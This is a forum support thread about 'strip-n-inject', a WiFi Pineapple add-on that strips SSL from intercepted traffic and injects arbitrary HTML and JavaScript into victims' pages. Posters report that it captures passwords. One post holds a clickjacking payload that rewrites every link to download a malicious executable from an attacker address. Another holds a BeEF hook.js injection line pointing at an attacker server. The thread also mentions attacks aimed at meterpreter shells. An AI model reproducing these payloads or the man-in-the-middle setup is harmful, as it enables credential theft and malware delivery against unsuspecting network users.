[Support] strip-n-inject

[leg3nd]

Description: This infusion will inject HTML code into a response from a server. The issue with ettercap and other proxies is that they cannot inject into SSL sessions as a result of the encryption. This infusion takes Moxie's SSLstrip and uses that as the proxy that injects code. This architecture provides 2 main benefits:

1. Strip SSL from sessions before injecting code which allows for a larger attack surface.
2. An asynchronous, non-blocking socket proxy provided by twisted-web gives much better performance from the client's point of view.

The attacks that can be implemented from this are endless.. SSLstrip for stealing passwords and inject BeEf hook.. or Java Applets... or Browser_AutoPwn in an Iframe.. All these and more will be possible via JasagerPwn or manually.

Feature Set:

• Installer - The installer will setup the SSLStrip dependencies. This will probably even fix your normal sslstrip infusion if you're having issues with it.
  • Note: This does not use the default SSLStrip on the system since SSLStrip had to be modified for this purpose.
• Log Output - Displays the log standard output that is generated by the modified SSLStrip. Yes.. you can get passwords still in here in the process.
• Attacker (single address) filter - Pretty self explanitory, this adds a '! -s attacker_ip' in the iptables rule so you do not inject code into your own browsing sessions.
• Injection Code Editor - Allows you to enter in any arbitrary code into the text editor. Note, if you have an attack running and modify this code - you need to restart the attack.
• Auto Refresh
• Enable/Disable and Logging in Small Tile

Screenshot (Interface):


Screenshot (Basic Alert Pop-up):

Credit:

• Infusion GUI: Whistle Master
• SSLStrip: Moxie Marlinspike

Cheers!

Edited October 25, 2013 by leg3nd

[levisiccard]

Got it installed! Grabbing a pizza out of the oven and will check it out tonight Hope it fixes ssl strip also, would be cool.

cheers!

[leg3nd]

Cool, please report any bugs so I can get em fixed up.

This is my advice with the SSLstrip issues:

• If SSLStrip is already working for you: don't press install because it will "just work" regardless if its "not installed"
• If SSLstrip is not working: The "Install" will likely fix it based on previous forum posts of SSLstrip installtions

This is basically the install script if you feel like trying it manually:

opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web

if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/
fi

if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/
fi

[levisiccard]

SSH for the sslstrip issues??

Further your infusion is working fine. also password sniffing for tcp-http. Can I just sniff passwords with it without sending the messages? greetz!

[leg3nd]

If it doesn't "just work", which it should with the install button, then you might need to SSH to debug it.

I'm sure you can theoretically do that but going into the "Injection Code" tab, removing all code, and saving it. This infusion is really not meant for sniffing passwords though - it lacks filters, log saving, less verbose output, etc. This infusion is meant for injecting code for more advanced attack vectors.

If you have this infusion working, you should be able to sniff passwords with the normal "sslstrip" infusion as they use the same dependencies.

[levisiccard]

hups, your infusion is working like a charm, also the password sniffing but I am unable to clear the sslstrip issue.

anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-)

I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment its all networking and windows server at school, wich is also taking a lot of time now...

Got to make choices man but love your infusion ;-)

[chriswhat]

Just wanted to say thanks. Prior to installing your infusion, SSLStrip was broken. In addition to the fun HTML injection, your infusion posts creds. Good work.

Add logging and I won't have a use for the SSLStrip infusion.

Edited October 25, 2013 by chriswhat

[leg3nd]

hups, your infusion is working like a charm, also the password sniffing but I am unable to clear the sslstrip issue.

anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-)

I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment its all networking and windows server at school, wich is also taking a lot of time now...

Got to make choices man but love your infusion ;-)

The great thing is that you dont need to know programing to mount these attacks. Thats what this script is for: https://forums.hak5.org/index.php?showtopic=30588

It will automate many advanced attack vectors that utilize code injection for you - generally with the purpose of returning a meterpreter shell.

Add logging and I won't have a use for the SSLStrip infusion.

I guess I could add logging/filtering to this... but that wasn't the original purpose of the infusion. If the SSLstrip module doesn't get updated then I'll just grab that logic and add it to this so it can be used for both sniffing and code injection.

[levisiccard]

hey, what is the new update from today about with the following new injection code?

<meta http-equiv="cache-control"content="no-cache"><meta http-equiv="X-UA-Compatible"content="IE=9"><script src="http://code.jquery.com/jquery-1.9.1.min.js" ></script><script>$(document).ready(function(){var div=document.createElement("div");div.id="overlayclick";div.style.zIndex="100";div.style.width="100%";div.style.height="100%";div.style.position="fixed";div.onclick=function(){window.open("http://172.16.42.160/run.php")};if(document.body.firstChild)document.body.insertBefore(div,document.body.firstChild);else document.body.appendChild(div)});</script><script>$(document).ready(function(){$("a").attr("href","http://172.16.42.160/run.php")});</script>

regards!

[leg3nd]

Whoops - that's the code from the ClickJacking attack that's implemented in JasagerPwn. It basically will replace all links on the page with a download to a malicous executable as a user browses. The main purpose I made this infusion was for the attack vectors I have in JasagerPwn.

The update mainly added some failsafe code to ensure the iptables commands are removed correctly and added additional verbosity to the log output.

Feel free to replace it with: <script>window.alert("Pineapple!")</script> for the simple popup window.

[xtr4nge]

Hi leg3nd, good job.

Take a look to this repo: https://github.com/xtr4nge/sslstrip

Response tamperer support (@kkotowicz) and Code Injection was implemented (@xtr4nge) in the same SSLStrip fork.

Options:
-t <config>, --tamper <config>    Enable response tampering with settings from <config>.
-i , --inject                     Inject code into HTML pages using a text file (default inject.txt)

For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name.

Also you can implement more advanced attacks using the -t option.

I'm adding these functionalities to my project this week.

regards,

[leg3nd]

Hi leg3nd, good job.

Take a look to this repo: https://github.com/xtr4nge/sslstrip

Response tamperer support (@kkotowicz) and Code Injection was implemented (@xtr4nge) in the same SSLStrip fork.

Options:
-t <config>, --tamper <config>    Enable response tampering with settings from <config>.
-i , --inject                     Inject code into HTML pages using a text file (default inject.txt)

For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name.

Also you can implement more advanced attacks using the -t option.

I'm adding these functionalities to my project this week.

regards,

Very cool.

Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks.

Thanks!

Edited October 27, 2013 by leg3nd

[Foxtrot]

Nice idea on the infusion, but don't you think that you should have a go at making your own UI? It just seems like all the infusions look the same, not just yours but most :)

[leg3nd]

Naw not anytime soon.. I can hack things together but don't care to spend my time doing web development.

Standardization is a good thing imo. No point in reinventing the wheel.

I guess if there became a need I might do it.. but im not much of a GUI fan to begin with.. I barley use it in my pentests to begin with.

[Whistle Master]

Personally, I like those infusions' UI :P

@Foxtro: Most of the infusions have the same UI as they are developed by the same person... Should I understand that you don't like my UIs ;) ?

[Foxtrot]

Not at all, im just starting to think you have an Alter-ego ;)

[xtr4nge]

Very cool.

Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks.

Thanks!

Hi leg3nd

Here you have a few screenshots of my SSLStrip fork implemented.

https://github.com/xtr4nge/FruityWifi/wiki/Tutorial-(SSLStrip)

regards,

Edited November 2, 2013 by xtr4nge

[secret4all]

I bought Mark IV month ago. How can I install on Mark IV?

Edited November 5, 2013 by secret4all

[WallE]

Is this new script bypass HSTS protection?

[leg3nd]

Is this new script bypass HSTS protection?

It was not designed with that in mind. I can look into the possibility of bypassing it if that is of interest to you.

[numericaldigitaldroned]

quick newbie question....

I have the "strip-n-inject" infusion installed to my SDcard as well as the "SSL Strip" infusion installed too.... I've been trying to run them both but it has occurred to me that perhaps it should be one or the other.

Thanks in advance to anyone who can clear that up for me.

[i8igmac]

I notice there's a lot to talk about SSLStrip.

just for example the droid application for facebook, has anyone had success on preventing ssl on droid applications?

[fanbase]

It can be both, simultaneously. In fact, this is one of the configurations that the jasagerPwn script sets up for you, with impressive effects.

[leg3nd]

I notice there's a lot to talk about SSLStrip.

just for example the droid application for facebook, has anyone had success on preventing ssl on droid applications?

It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes it would work.

However most application development teams, especially the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake of thing that Secure Development Life Cycles look to prevent.

[toan3000]

It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes it would work.

However most application development teams, especially the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake of thing that Secure Development Life Cycles look to prevent.

Hi @leg3nd, i tried your infusion many time but never success inject hook.js in traffic thought my Pineapple. I config my Pineapple work as "client mode", my inject code is "<meta http-equiv="cache-control" content="no-cache" /><script src=\"http://172.16.42.3:3000/hook.js\" type=\"text/javascript\"></script>". My laptop is Kali Linux (172.16.42.3) running beef server. I ssh to pineapple (172.16.42.1) and run start.sh from "/pineapple/components/infusions/strip-n-inject/includes/".

Everything seen ok, but when i test suff web througt pineapple, the html page not be injected, i check the source code of html respone and it not have hook.js.

I don't know what's wrong? You can help me? Thanks alot!